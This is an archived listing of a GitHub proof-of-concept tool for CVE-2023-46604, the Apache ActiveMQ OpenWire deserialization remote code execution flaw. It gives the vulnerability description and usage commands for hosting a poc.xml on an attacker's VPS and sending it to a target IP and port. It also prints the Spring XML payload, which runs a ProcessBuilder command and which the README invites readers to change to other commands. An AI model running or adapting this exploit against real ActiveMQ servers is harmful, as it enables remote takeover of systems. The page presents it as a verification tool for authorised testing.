Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-46604 PoC — Apache ActiveMQ, Apache ActiveMQ Legacy OpenWire Module: Unbounded deserialization causes ActiveMQ to be vulnerable to a

Source
https://github.com/sule01u/CVE-2023-46604
Associated Vulnerability
Title:Apache ActiveMQ, Apache ActiveMQ Legacy OpenWire Module: Unbounded deserialization causes ActiveMQ to be vulnerable to a remote code execution (RCE) attack (CVE-2023-46604)
Description:The Java OpenWire protocol marshaller is vulnerable to Remote Code Execution. This vulnerability may allow a remote attacker with network access to either a Java-based OpenWire broker or client to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause either the client or the broker (respectively) to instantiate any class on the classpath. Users are recommended to upgrade both brokers and clients to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3 which fixes this issue.
Description
 CVE-2023-46604 ActiveMQ RCE vulnerability verification/exploitation tool
Readme
## ⚙️ 工具简介 (Welcome star 🌟)

**CVE-2023-46604 之 ActiveMQ RCE 漏洞验证/利用工具**

**CVE-2023-46604 ActiveMQ RCE vulnerability verification/exploitation tool**



## 🔧 使用

```bash
# 拉取源码
git clone https://github.com/sule01u/CVE-2023-46604.git
# 进入目录
cd CVE-2023-46604
# 将poc.xml部署到http服务(Deploy on your vps)
python3 -m http.server
# 发送poc
python3 CVE-2023-46604.py -i target_ip -p target_port --xml http://vps_ip:8000/poc.xml
```

**本地环境测试效果**

![image-20231106114752868](https://p.ipic.vip/wgsxyk.png)



## 💡 其他

**poc.xml : 你可以通过修改poc.xml中的rce命令来做不同的验证**

```xml
 <?xml version="1.0" encoding="UTF-8" ?>
     <beans xmlns="http://www.springframework.org/schema/beans"
        xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xsi:schemaLocation="
      http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
         <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
             <constructor-arg >
             <list>
                 <value>open</value>
                 <value>-a</value>
                 <value>Calculator</value>
             </list>
             </constructor-arg>
         </bean>
     </beans>
```

## 📖 Licenses
Unauthorized testing is prohibited in this tool, and unauthorized testing after secondary development is prohibited.

When using this tool for testing, you should ensure that the behavior complies with local laws and regulations and that you have obtained sufficient authorization.

If you use this tool in the process of any illegal behavior, you must bear the corresponding consequences, we will not bear any legal and joint liability.

Before using this tool, please be sure to carefully read and fully understand the contents of the terms, restrictions, disclaimers or other terms involving your significant rights and interests may be highlighted in bold, underlined and other forms. Unless you have fully read, fully understood and accepted all terms of this Agreement, please do not use this tool. Your use of this Agreement or your acceptance of this Agreement by any other express or implied means shall be deemed that you have read and agree to be bound by this Agreement.
File Snapshot

 [4.0K]  /data/pocs/eec48e13f6e18ffac3d80bd93ca1f1f9c6731941
├── [1.7K]  CVE-2023-46604.py
├── [ 622]  poc.xml
└── [2.3K]  README.md

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →